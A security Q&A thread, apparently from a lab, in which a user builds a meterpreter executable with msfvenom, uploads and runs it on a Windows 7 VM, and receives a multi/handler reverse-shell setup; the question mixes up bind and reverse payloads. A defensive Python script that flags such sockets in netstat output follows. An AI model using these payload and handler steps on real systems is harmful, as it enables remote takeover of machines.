
I am trying to exploit a Windows 7 VM using metasploit. I was able to open a java meterpreter session and I want to access a native meterpreter. To do so I exported a meterpreter/reverse_tcp payload to an .exe using msfvenom:

msfvenom -p windows/meterpreter_bind_tcp LPORT=5555 -f exe > bindtcp5555.exe

I then uploaded that executable to the target machine using the java meterpreter and started the process using a native shell:

meterpreter> upload ./bindtcp5555.exe
...
meterpreter> shell
...
C:.../Desktop> start bindtcp5555.exe

I confirmed that the target is listening on port 5555 using nmap. But now I am stuck: how do I connect to that meterpreter session using msfconsole?

Ignatius_Gim

1 Answer


I received some help on this offline, and I will post my solution here. I was pointed to this article: https://www.sciencedirect.com/topics/computer-science/meterpreter-shell

Essentially, you need to use the module multi/handler to open a session with the remote meterpreter session. Furthermore, I misunderstood the LPORT option: it is the port on the attacking machine that the remote meterpreter will report back to. You also need to set the LHOST option to the attacking computer's IP address.

After uploading the exe to the victim and starting the process, run multi/handler from the attacker:

msf5> use multi/handler
msf5 exploit(multi/handler)> set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler)> set LHOST <HOST_IP>
msf5 exploit(multi/handler)> set LPORT <HOST_PORT>
msf5 exploit(multi/handler)> set ExitOnSession False
msf5 exploit(multi/handler)> exploit -j

Note: it is important that HOST_IP and HOST_PORT match what you had set in the payload when using msfvenom.

This should open a meterpreter session which can be accessed using sessions -i N (where N is the session number).

Ignatius_Gim
Comment (lab9, Jul 17 '20 at 21:55): But in your question you still describe the creation of a _bind_ payload. That doesn't fit your answer. I'd suggest that you edit your question to reflect what you've written in your answer (which is a reverse payload).
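The bind-versus-reverse distinction the answer and comment turn on is also what a defender sees on the host: a bind payload leaves the target listening on an unexpected port (5555 in the question), a reverse payload leaves an unexpected outbound connection to LHOST:LPORT. The following is an added example, not code from the original post, that flags both patterns in constructed `netstat -ano` output; the baseline port sets are assumptions for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of Windows `netstat -ano` output, not real data.
# Row 1 shows what a bind payload looks like (target listens, attacker connects in);
# row 3 shows what a reverse payload looks like (target calls back to LHOST:LPORT).
SAMPLE_NETSTAT = """\
  TCP    0.0.0.0:5555           0.0.0.0:0              LISTENING       3120
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.0.2.10:49712       198.51.100.7:4444      ESTABLISHED     3120
  TCP    192.0.2.10:49713       198.51.100.8:443       ESTABLISHED     2004
"""

# Assumed baseline for this example: ports a host is expected to expose or reach.
EXPECTED_LISTEN_PORTS = {135, 139, 445, 3389}
EXPECTED_REMOTE_PORTS = {80, 443}

LINE_RE = re.compile(
    r"^\s*TCP\s+(?P<lip>[\d.]+):(?P<lport>\d+)\s+(?P<rip>[\d.]+):(?P<rport>\d+)"
    r"\s+(?P<state>\w+)\s+(?P<pid>\d+)\s*$"
)


def parse_netstat(text: str) -> List[Dict[str, str]]:
    """Parse the TCP rows of `netstat -ano` output into dicts of named fields."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rows.append(m.groupdict())
    return rows


def find_suspect_sockets(text: str) -> List[Tuple[str, int, int]]:
    """Return (kind, pid, port) for sockets outside the baseline.

    'bind'    = LISTENING on a local port not in EXPECTED_LISTEN_PORTS
    'reverse' = ESTABLISHED to a remote port not in EXPECTED_REMOTE_PORTS
    """
    findings = []
    for r in parse_netstat(text):
        pid, lport, rport = int(r["pid"]), int(r["lport"]), int(r["rport"])
        if r["state"] == "LISTENING" and lport not in EXPECTED_LISTEN_PORTS:
            findings.append(("bind", pid, lport))
        elif r["state"] == "ESTABLISHED" and rport not in EXPECTED_REMOTE_PORTS:
            findings.append(("reverse", pid, rport))
    return findings


if __name__ == "__main__":
    for kind, pid, port in find_suspect_sockets(SAMPLE_NETSTAT):
        print(f"{kind:8s} pid={pid} port={port}")
```

Both findings here point at the same PID, which is the kind of correlation (one process both listening and calling out) worth pulling into a host alert.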